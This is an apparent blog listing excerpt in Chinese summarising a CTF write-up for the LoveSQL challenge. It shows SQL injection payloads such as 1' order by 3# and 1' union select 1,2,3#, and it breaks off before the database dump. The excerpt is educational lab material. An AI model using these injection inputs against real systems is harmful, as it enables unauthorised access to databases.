2024年12月5日
web20([极客大挑战 2019]LoveSQL):
摘要: 1.对用户名和密码输入1 查看回显(提示错误密码) >将用户名修改为1'(报错,找到注入点) 2.对用户名依次输入 1' order by 4# 1' order by 1# 1' order by 3# 测试出有3列 测试回显位: 1' union select 1,2,3# 联合查询: 爆库名: 阅读全文
posted @ 2024-12-05 21:13 舌口 阅读(3) 评论(0) 推荐(0) 编辑